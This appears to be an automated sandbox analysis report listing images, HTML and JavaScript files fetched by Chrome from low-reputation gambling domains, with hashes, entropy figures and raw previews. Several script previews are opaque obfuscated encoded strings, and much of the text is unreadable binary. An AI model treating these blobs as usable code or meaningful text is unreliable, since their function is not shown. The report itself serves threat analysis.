                                                                                                                                                          Preview:.PNG........IHDR.............;0......pHYs................kIDATH....o.W.......w....k.....Q..$.....R.............5.P%(}*T.....<T..+.R.hi...Ic..N.;....^......9<...B.*..<}~G....c.$..D..].S.sO.<..W....d.Pq..p}.L..a.*........Z.............l....k.4..V......?...4.g_K.0...<.P........*j...|.-.C.M..E,..9#...B.lz.K.....[..n`.,...pM...(....f`%U.\l..#?.......[....x..l..i h)..=}.. .FM.J..2.,=..O>...\:...U..q...m.t...$.+... .8....z%w...T.+A.....>t......khlk.3.`....nvi..v&lN?...@xn|...u-v..QYx.mG.&.;.;.(w..Q.........}.,..[..y..j.....0.f..zd.....iP@5$..........v..<.Z[PV..c.....3..=..*@M.....Q.F)8.... ...@x..k..k......[...}..T....*.G..!...V..x.9hR..&....tq...ZD'C.. ...m8....Z...P.@.....C..@..%>...wf...@.GP(.........v9.T......a.q.r......K..6+.A-........J._{...'.i....>....>.Y..?x...{#A..t.....%c;......./..../.....n..KV..L.Y..0.N...$X.v.V.9T.%,O,....7......r).L.../.C.W..O.,....G]....R...F.@{..ZSz..\.....F......kL.J..KvA0AD..q..{.P.!.d*....T...Dr.....CH..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (6075), with CRLF line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):35313
                                                                                                                                                          Entropy (8bit):5.295540132066821
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:4WL+KxZDns9s+CaAttQyYgm+po5THCAAoT5CvohyZVD/aQHAfr6vWgwkDHqAZ:41kZ9auYo2HCA9tlhytv3wa
                                                                                                                                                          MD5:0D329DF2282392F7C5B7DC987318D388
                                                                                                                                                          SHA1:B49E384DB02B755EAB09D4441ECD9538B9488D56
                                                                                                                                                          SHA-256:18AFA71FF8EB7C6184F4AF6D4CC82F3764997BF1D85B4C74070A215EEEF25A3B
                                                                                                                                                          SHA-512:764B95B306F6BE43895AA884C83078357B59DC5081448D76A645C8D056D4C00FF6DB41B3A002C1A167FE22891F1DE836CB2CF86CB1091068C3E370D602499394
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://hg679.cc/default.html
                                                                                                                                                          Preview:<!DOCTYPE html>..<html>....<head>.. <meta charset=utf-8>.. <meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no">.. <title></title>.. <style>.. .init-ip-block{position: fixed;top: 0;left: 0;background-color: #000;}#home-fake-app{width:100%;position:absolute;top:0;left:0;z-index:-1}body{margin: 0;padding: 0;}#error-main{position:absolute;top:0;bottom:0;left:0;font-size:14px;text-align:center;width:100%;height:100%;overflow:hidden;box-sizing:border-box;z-index:1000;background-color:#fff }#error-main .middle{position:absolute;width:100%;top:50%;left:0;transform:translateY(-50%) }.tips-img{width:150px;height:93px;margin:auto auto 5px;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAARcAAACtCAMAAACtK8tBAAAA8FBMVEUAAACwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCvr6+wsLCvr6+wsLCwsLCwsLCwsLCwsLCwsLCvr6+vr6+wsLCvr6+urq6wsLCurq6urq6wsLCvr6+wsLCwsLCurq6wsLCwsLCwsLCwsLCwsLCurq6urq6urq6wsLCwsLCwsLCwsLCvr6+wsLCwsLCpqamwsLCtra2pqamwsLCwsLCwsL
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 963 x 45, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):40722
                                                                                                                                                          Entropy (8bit):7.935240503998428
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:6dHB36liXQidlxJ0ylw/aIJutBVmwNylHHTeC0aIIyKAeU6POjDD3ctWrvJ:6j6IQ2kaXvmwNkn6H4U6PQ3ZrB
                                                                                                                                                          MD5:4527E094963BD7ED2C2AF6C6EFA850DA
                                                                                                                                                          SHA1:37FA3D05B9DAFF5C2006B001C7658AE1CA5A059E
                                                                                                                                                          SHA-256:B2813EAC4754D548F115E904529A1F4FC0D88EBE03E5048C5E75CD793605AD37
                                                                                                                                                          SHA-512:7F91CD2B4697DCB6519453F7289DD15283E9323BFA8B97BC8D2D1D4F888C7554C76ABC5F6E2193328FDC213B2C9AE5BEF0B5461BEEEF2FD3550F7740726E7823
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.......-.......Y....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be9, 2021/12/08-19:11:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop 22.4 (Windows)" xmp:CreateDate="2022-06-08T15:04:24+08:00" xmp:ModifyDate="2022-06-08T15:05:09+08:00" xmp:MetadataDate="2022-06-08T15:05:09+08:00" xmpMM:InstanceID="xmp.iid:2d3018ee-5bd6-444f-8b27-076f830409c3" xmpMM:DocumentID="xmp.did:2B7A426AF36B11EB8EFACF51E005D5FF" xmpMM:OriginalDocumentID="xmp.did:2B7A426AF
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (760), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):760
                                                                                                                                                          Entropy (8bit):5.710786358990766
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:4chWvnTeh+TJzRicmXZStxj9Xz9cudnPmvRoOBCXoI+huRluN6rL3kSjq31JhWkG:VGaMficcMxj9Xz9c6nPaTBmMhuGNqLUg
                                                                                                                                                          MD5:1981D35BBD195A80CB7E031D80873C13
                                                                                                                                                          SHA1:382F0AB8C43D027A4F99933929022231461863D8
                                                                                                                                                          SHA-256:B98599E45C89EA6DEC465E44CD5DE8BA09EB0382DEEFF76B6D450D1A49CD62DC
                                                                                                                                                          SHA-512:E7968FCCD69A15A659B96B0A2FE5507C469FA5C2E93D889C01594E2EB1C1132E153761CD7B3F514A8380BDCF95BA4FAEBD974FD9AA6B3E5FB8AE83EB27411FA7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/iconSvg.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgGYBdAGgG8AiARgDcANANkoC4AzAVzRgBcBLdJh6kQpJAEoqHJCAAESHgCc+vSgG4A8mABWIXgDoAJiDZ80IAAqKUEEIp4BPTKMoB9VyCQBZFIY4AbEEoKWih/DhAWAEIABgBfcTUAZSUzAHNSACEUFECoNDVQxVk0AF5yNCgAW0jKFXQAWiRaNOCIawgkFnJ6tABhfygkLvJHWxYU5TQMxRAARw4+WcNo+NJrHigeSNGHcezckHzSYzYoAJ5o6ji40hgUKogObZWe+7QAOWrIzm5+QUksx4HEUaEoAGJeg1KABqHgACz4SH0vQGQyQN1uUHKszQxkU7C4vAEaEwkiKsh4pQRSP0ABIYLMtiAAKKBGpoYQgamI5GuGT+Nj6VwwAA+op4aiBILQshAmDqwXIMEGwxYlH8KB4PAavVksJpyNRqoxpGw8sozVaFAUWxUaLVlpauvewRV6O6G2ZLEN+i92yx2sUIzYKBg0igYEC6rO/hkwUoUGUUAaiMMxjB6qUEUoNzNFukQQoWyUI0oAA9/GY4Cx4bM2Kxfb0vjUbuJiO3xLdbfwYAAlEB4uwAMTQXWwxDihSTsj4pSQCoAagBVAD0AA5KOJMGhSFBSFFqKRfsTBDxJAvKHBlwBFJJb26UQxbFO0BoAFnXhHwUHXMQAnMEaABP4iQgEYJjnP4VJ8PoIDlhAKD2Ka153oSfwkkIIiSG2ahAA")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 54 x 54, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3109
                                                                                                                                                          Entropy (8bit):7.706283039882216
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:ZA0+0WPeAdf+SDoEP12T9HeENggB36lCnRCylQ1:t5Gl925HogpHRJ+1
                                                                                                                                                          MD5:6E108EFDC69187A1FF89C67E47C47489
                                                                                                                                                          SHA1:052D793F9D0111E88D700C76B67C9238AF59AE08
                                                                                                                                                          SHA-256:73E1649EF12CC18AFB948D9C68089242053E2979CF314C7CEB7185E303322395
                                                                                                                                                          SHA-512:A12A3F2C1CA15C137F4A9885C63C03F83415350BCB356EFEA2996375603B5DDE8E8CC6EAF6F5E8F6165BFD23606FCC4D8F767538F3E81CC554373AA493384FC6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...6...6......Ej.....tEXtSoftware.Adobe ImageReadyq.e<...)iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:D1E20A4921F511EE95B3B3F5D30ADB92" xmpMM:InstanceID="xmp.iid:D1E20A4821F511EE95B3B3F5D30ADB92" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2983C652F3A111E79560918E92C2051D" stRef:documentID="xmp.did:2983C653F3A111E79560918E92C2051D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......IDATx..Z.p.W.>{w/b.)*.D.I...6.G=.QS.%3..R.at*..C....V.B.....vhG=ZD..x.....{w.../s.v....crf.9..=.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):17878
                                                                                                                                                          Entropy (8bit):7.959716583208729
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:OBLtpneFRErL/izHYU4KNT+GbKJrnl0YMMlTY3X4K6gwI:YtpnCErkN4K8GbKJrnl4Y/gL
                                                                                                                                                          MD5:3421B805EE092419843BD0B3CF2F3AD5
                                                                                                                                                          SHA1:FCDCA9406D3B0A7DE619225D006968F16F401528
                                                                                                                                                          SHA-256:2E72A4B6BB750E21045AA7BA60ABFBD2EA5FB721579ABD2F75875008FD815BD4
                                                                                                                                                          SHA-512:1A8AD295C8B019AE032F5CF1F3A188C189F8B128F6459174D3817147338E3AAD4BE739E869D796161D5F0390820D96916E16FEF371FD9F33C5282B92F67D5599
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/allbet_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BF908D208D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BF908D1F8D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 26, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1924
                                                                                                                                                          Entropy (8bit):7.381935205755982
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:nzo7FDNn2DUioJ3C7mg+A+4QyGxtacTQJ7lMMsFn:zo7F52QiZ7mg7/etauM94n
                                                                                                                                                          MD5:12FBA25CCB3FAC095283A1AAC536AC93
                                                                                                                                                          SHA1:1B3BB42B050723D5B00E90CD9B9F947C6D3A1FAC
                                                                                                                                                          SHA-256:C509677279780CD23C0755810B0FCE3830B946FA44E3FE0EEF3F685C55FCCDDF
                                                                                                                                                          SHA-512:788E34DEF5AAB15A5DA0E94AAF282A18DD5E48AB938C44B2D8D62E90BD617CE3C01250502A2C36EA7577602AEBCEA94EEF6871D4A4227CD68BC317335C6818D6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/index/121/nav/esportico.png
                                                                                                                                                          Preview:.PNG........IHDR............./.{.....tEXtSoftware.Adobe ImageReadyq.e<...!iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:A8067B06A6D711E9B5A0C4B8A318A102" xmpMM:DocumentID="xmp.did:A8067B07A6D711E9B5A0C4B8A318A102"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A8067B04A6D711E9B5A0C4B8A318A102" stRef:documentID="xmp.did:A8067B05A6D711E9B5A0C4B8A318A102"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>@g.h....IDATx.b...g..`b..`./-.../..-)"...~...../.w.\..5A..q....ks.b.......%.^X..[..111B....^..%.FK...]l...i..v,|..?HpE
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):17264
                                                                                                                                                          Entropy (8bit):7.957851912730042
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:Bd/F5IhIlqmVUgkOduOyX2sjzELCfBhC6DvFSi9q:B70IImVUvOduOyGsikhC6DvFE
                                                                                                                                                          MD5:CF4793E4F829969195CB58EFFDFFCC3C
                                                                                                                                                          SHA1:73EA126C25F1EC7E02A3216AFBDC68204EDC18BB
                                                                                                                                                          SHA-256:1E91C94ABA2BC799802FCB49FEE566D9095FE76D2C2EEBE7E876E06E50DD6E00
                                                                                                                                                          SHA-512:6C837B9092076E7DA94E8305573C76631CA9402B2E903D6B9EF10EB18585D874B1F29F2D2267D34DCCE18AEAE0172A3E0023354C01EF7A44827EA09A264B8D84
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/video/gd_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BF908D248D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BF908D238D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):37013
                                                                                                                                                          Entropy (8bit):7.99100171903598
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:BRq4t6g43dRcCVXdzsrkR3775poBVDiPbaNrQ8IQm/uiks0A/891:vB4/PVXh6kR5kVDizaN7IQm/uiksx/K1
                                                                                                                                                          MD5:8CE24388402E479013050EB3E0BFE597
                                                                                                                                                          SHA1:20FC8814742CAFD113EC4DF36933DDE7FCFB2E16
                                                                                                                                                          SHA-256:C1A4848084C407081F54083AD97D8F66BACD575F8517DBC5C00EFF9C1269CF2A
                                                                                                                                                          SHA-512:CFD501E8423146DDD0B5D9699A7C48867210AA3A0A10FF2113A69966D2217D706D8802B2FF88AAF459C6BE5D0C07E003E786BF04E90353189251C8D5B77AF40B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:385B1076459011EABAEFCA67C4E9E386" xmpMM:DocumentID="xmp.did:385B1077459011EABAEFCA67C4E9E386"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:385B1074459011EABAEFCA67C4E9E386" stRef:documentID="xmp.did:385B1075459011EABAEFCA67C4E9E386"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx...|U.....q........Cp..D...V..:..U[.g...Z..u..*(.. .G ....{...?.{nB........!..g...}..3......<.d.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):140
                                                                                                                                                          Entropy (8bit):5.3256535880866425
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtLdlUmuL1//K0/jp:6v/lhPKM4nDspLfUP5jp
                                                                                                                                                          MD5:1841443641AF694C6515E15166B04B68
                                                                                                                                                          SHA1:58AD8383DDB30D9E9C27A563712B3F0747920384
                                                                                                                                                          SHA-256:B8F06A19EF29E66C792C9C2828A5A49206B70759B20492C1B827300DE8228B1C
                                                                                                                                                          SHA-512:C2CA036FD9C9DEED8255D516A6007BF68BB7A1C04BE59A2B7162DC343117A1B1773A593F81BA012F828A7381735B5AC4F4EF0583D449C4BDBE9B079FEE2D165C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://f21714.com/favicon.ico
                                                                                                                                                          Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...1......i..3..$`...................0.@..=..gI....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):140
                                                                                                                                                          Entropy (8bit):5.3256535880866425
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtLdlUmuL1//K0/jp:6v/lhPKM4nDspLfUP5jp
                                                                                                                                                          MD5:1841443641AF694C6515E15166B04B68
                                                                                                                                                          SHA1:58AD8383DDB30D9E9C27A563712B3F0747920384
                                                                                                                                                          SHA-256:B8F06A19EF29E66C792C9C2828A5A49206B70759B20492C1B827300DE8228B1C
                                                                                                                                                          SHA-512:C2CA036FD9C9DEED8255D516A6007BF68BB7A1C04BE59A2B7162DC343117A1B1773A593F81BA012F828A7381735B5AC4F4EF0583D449C4BDBE9B079FEE2D165C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...1......i..3..$`...................0.@..=..gI....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 176 x 183, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):71418
                                                                                                                                                          Entropy (8bit):7.988516517678927
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:3aYVVfDOne1vnhkIUp5Bgcw3+JMu17lUzWur/d:q8bVyIUlg73OT7lUzFd
                                                                                                                                                          MD5:979BBD83B9BF4E3B030555C4FC01AFAD
                                                                                                                                                          SHA1:8008E1924F18ACB37F08BE6DA4204ED6D53C4750
                                                                                                                                                          SHA-256:38C520332857D5195479FB84B75E34AD5C98FF85C204AA1A8E9E04E1C441FB7D
                                                                                                                                                          SHA-512:5EA856717A094FA2F0907C5A368409FE9EF9B6B8221BA90262FAEDF09EF31ED0F3C8D5168179C43B2829CB165415F56633A21A13AEFB895CADE901F0FCFFF6D5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.....................gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......IDATx...g.eYv..~k........L....v.....P..8 G )....c...`0.....I.H.@..@.$H....mP].e......{....zw.6...U]m@.(.9;..}..{.9.^..k}km..r.........l2;...8..`....A|g.U....fg.......a..........}>.h@r../.N.x.Y..o.B.=..K.hm!..)......}.....X.7f.u...].......;....F..`...a@..].......=.og...c.Gk.........w.=.....................3........4k..`6.C.......#..............`G.%0..1.2.;..s?x......hd.R.4.m......m....c....g...q...@4Z..n.Zk?r.....{K!v.. .@.V.....|...G.g#za.~g...c?.\...G...}.&p\.z./.[......O<q.0...1#*. e.................Z.".1..}... ...qV.V+X.=.a..TA:>.1 ...g...G.1..@..V..hp....;........(.&...1{...Z..!MS.RZ.......1..m..%.A.....j.z..a.......W.,....|.....=..c.{.x.........Y0..P...|...!5.....$.......}nk.h{..k9vY.h;.9_............M..;.z.........c....^....}....!..........b...}03...... .......h.b......oS..).c..i.w.C..W.B....7...{..6..+...p5..+7.^b.....&.>...3
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (18632), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):18632
                                                                                                                                                          Entropy (8bit):5.98982907585414
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:VuRs8jbUtpZjiZeg6Egf33db/h8a+DpBseCZJDkHN0I30QA3yj+Xn:4fU7ZKeg6Egf3by90DkH6Ipea+Xn
                                                                                                                                                          MD5:8AF7B35CAD66377E98B98D4261BB716D
                                                                                                                                                          SHA1:BD52F02009810E35FC621D7111D46F1A51E4435E
                                                                                                                                                          SHA-256:D4B93FA7F565BA13F42FAC331764CF7783550C11DF1624BB1779038FF30CF6CE
                                                                                                                                                          SHA-512:3BB40D0D221C1CD35D93E22DC32C80BE5D078393242798DFCAFAF98C8620FA828C7A497FE3F3D32EFADDD280B2B2CDB88158F6490C9BA88E400B387E8C811F3B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/240516-03/static/js/manifest.js
                                                                                                                                                          Preview:a4vjeuue("IQMwrgdgxgLglgewgCgQSgN4DcCGAnAAgGcBeAdzggBMEyA6MgUwCMAHHKAawCkilWA3BWq0GLdl178S4aPCTIYAGgC2SgFaYQCPMlyFWSuErxKoJAAxKANiQDaAXQFQAPDDrXGEAOYwAFs4A1IFocCQwdlAOSox2cA4AZAnWdKxgRH7IsfF2Fg5oMXEOlgLauqwElAQqaADyzOqMsKl4CDBtAJ6sjHR+OES1ZBAACq3deDAddFA41tbIaqxoSah2rMUqa/mlOshESUSKqhpoAimePv4CaCkZcCAwyGhPAvfImmXI5hbOLuoeXl8ASgwTQeBIKAgdFI6ki2zwjBgYDwEAIeAAvgJ9AQYCQMOiYniAIwATlJAC4LJjZLBEKiUERMG8IkR8gikSicXZWXRGAAPVg6GBELH4AiMcLc4oYODkog2cnAIkxAVCojk/GY9nI1EIKXTWbzHr8wUTeWMGK81VmpQQAo9WzAKzG63C9FQiU0+QodDYMWkWIIJxvCwkMOM7WciCMMgEUYIFRwIiMZBeumoTAIJ7o05vCOInXEOwAJic2Nx0dj8cTydTkFpCmUdowAbsQfsTYcOYERBLxRgosIKhINCgYBUXnc3kRAFFPBOIMKAEIdAAqOG8ADkcBPkAAiPyMHBUPdoXLRdQjhBjhfuKAInAwRhzxi3/dEe9wVgwU8Cf6TboSD3J8+RgAB6dQcFwD88C/H8NGmPo8GTXE9zAGAQAAWgADj3BD+g6aASCdBD4AnBB0JIIli0YAAWW06GgJJ/hQgBBGAYFg5h0JTPcICQKBGDwqFoAKFi8HMKFWECPcwOLWiLAAViJAA2TCLAAZjAogYEfOAoAgogwL3QJkAwCxyWAhSVIAdkwygqH5TD1CIPCiUsmANOwmy7IcpyXLw4sPI0xTaKJezqH81ylA0jzsPiklMLaQ88AAYSQLCAqUWi4oSiLHL5ZzosUjyVIsJSkv8Rg0oyoq8JU0rysU
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (980), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):980
                                                                                                                                                          Entropy (8bit):5.745839646641137
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:VKScZwL0DDn0tI5HVZ7OitgDkXQnKxq3QpK4sn:VK3ZkwD02DZsDYQnKxoQs4s
                                                                                                                                                          MD5:C5EA2C39CF8D8F2BCF002A7B3D42210C
                                                                                                                                                          SHA1:6295B3EE072AFA2D21495AC109CF6CA725898D75
                                                                                                                                                          SHA-256:19BD170EAFDA0AB580FBBE13D020D9D537A5BE8EB5D1D51FC3112FD6D4D9A82D
                                                                                                                                                          SHA-512:903D690FC3E119D983DD0715CB78761E75495ACAE6D822F6172CF9F09B3DD438049939F2A0230DB12A2F2E5D80F13986BF570EF275E5AF6B9920321BA673B46B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/toast.js
